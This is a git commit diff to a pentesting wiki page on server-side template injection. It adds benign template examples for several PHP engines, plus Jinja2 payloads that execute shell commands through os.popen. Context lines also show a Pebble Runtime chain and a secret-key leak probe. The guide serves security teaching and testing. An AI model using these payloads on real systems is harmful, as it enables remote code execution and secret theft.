GITBOOK-3840: change request with no subject merged in GitBook

2025-02-16 14:08:26 +00:00 · 2023-03-28 17:50:22 +00:00 · 2023-03-28 17:50:22 +00:00 · 4e9432ed74
commit 4e9432ed74
parent 85479f242d
1 changed files with 125 additions and 8 deletions
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@ -324,9 +324,6 @@ New version of Pebble :
 {% raw %}
 {% set cmd = 'id' %}
 {% endraw %}
-
-
-
 {% set bytes = (1).TYPE
     .forName('java.lang.Runtime')
     .methods[6]
@ -544,6 +541,104 @@ $output = $twig > render (
 * In Twig and Twig (Sandboxed) section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
 * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#twig)

+### Plates (PHP)
+
+Plates is inspired by Twig but a native PHP template engine instead of a compiled template engine.
+
+controller:
+
+```php
+// Create new Plates instance
+$templates = new League\Plates\Engine('/path/to/templates');
+
+// Render a template
+echo $templates->render('profile', ['name' => 'Jonathan']);
+```
+
+page template:
+
+```php
+<?php $this->layout('template', ['title' => 'User Profile']) ?>
+
+<h1>User Profile</h1>
+<p>Hello, <?=$this->e($name)?></p>
+```
+
+layout template:
+
+```html
+<html>
+  <head>
+    <title><?=$this->e($title)?></title>
+  </head>
+  <body>
+    <?=$this->section('content')?>
+  </body>
+</html>
+```
+
+### PHPlib and HTML\_Template\_PHPLIB (PHP)
+
+[HTML\_Template\_PHPLIB](https://github.com/pear/HTML\_Template\_PHPLIB) is the same as PHPlib but ported to Pear.
+
+`authors.tpl`
+
+```html
+<html>
+ <head><title>{PAGE_TITLE}</title></head>
+ <body>
+  <table>
+   <caption>Authors</caption>
+   <thead>
+    <tr><th>Name</th><th>Email</th></tr>
+   </thead>
+   <tfoot>
+    <tr><td colspan="2">{NUM_AUTHORS}</td></tr>
+   </tfoot>
+   <tbody>
+<!-- BEGIN authorline -->
+    <tr><td>{AUTHOR_NAME}</td><td>{AUTHOR_EMAIL}</td></tr>
+<!-- END authorline -->
+   </tbody>
+  </table>
+ </body>
+</html>
+```
+
+`authors.php`
+
+```php
+<?php
+//we want to display this author list
+$authors = array(
+    'Christian Weiske'  => 'cweiske@php.net',
+    'Bjoern Schotte'     => 'schotte@mayflower.de'
+);
+
+require_once 'HTML/Template/PHPLIB.php';
+//create template object
+$t =& new HTML_Template_PHPLIB(dirname(__FILE__), 'keep');
+//load file
+$t->setFile('authors', 'authors.tpl');
+//set block
+$t->setBlock('authors', 'authorline', 'authorline_ref');
+
+//set some variables
+$t->setVar('NUM_AUTHORS', count($authors));
+$t->setVar('PAGE_TITLE', 'Code authors as of ' . date('Y-m-d'));
+
+//display the authors
+foreach ($authors as $name => $email) {
+    $t->setVar('AUTHOR_NAME', $name);
+    $t->setVar('AUTHOR_EMAIL', $email);
+    $t->parse('authorline_ref', 'authorline', true);
+}
+
+//finish and echo
+echo $t->finish($t->parse('OUT', 'authors'));
+?>
+```
+
 ### Jade (NodeJS)

 ```javascript
@ -562,6 +657,22 @@ $output = $twig > render (
 * In Jade section of [https://portswigger.net/research/server-side-template-injection](https://portswigger.net/research/server-side-template-injection)
 * [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jade--codepen)

+### patTemplate (PHP)
+
+> [patTemplate](https://github.com/wernerwa/pat-template) non-compiling PHP templating engine, that uses XML tags to divide a document into different parts
+
+```xml
+<patTemplate:tmpl name="page">
+  This is the main page.
+  <patTemplate:tmpl name="foo">
+    It contains another template.
+  </patTemplate:tmpl>
+  <patTemplate:tmpl name="hello">
+    Hello {NAME}.<br/>
+  </patTemplate:tmpl>
+</patTemplate:tmpl>
+```
+
 ### Handlebars (NodeJS)

 Path Traversal (more info [here](https://blog.shoebpatel.com/2021/01/23/The-Secret-Parameter-LFR-and-Potential-RCE-in-NodeJS-Apps/)).
@ -750,11 +861,6 @@ Check out the following page to learn tricks about **arbitrary command execution
 {% debug %}
 {% endraw %}

-
-
-
-
-
 {{settings.SECRET_KEY}}
 {{4*4}}[[5*5]]
 {{7*'7'}} would result in 7777777
@ -773,8 +879,19 @@ Check out the following page to learn tricks about **arbitrary command execution
  </ul>
 {% endblock %}
 {% endraw %}
+```

+****[**RCE not dependant from**](https://podalirius.net/en/articles/python-vulnerabilities-code-execution-in-jinja-templates/) `__builtins__`:

+```python
+{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
+{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
+{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
+
+# Or in the shotest versions:
+{{ cycler.__init__.__globals__.os.popen('id').read() }}
+{{ joiner.__init__.__globals__.os.popen('id').read() }}
+{{ namespace.__init__.__globals__.os.popen('id').read() }}
 ```

 **More details about how to abuse Jinja**: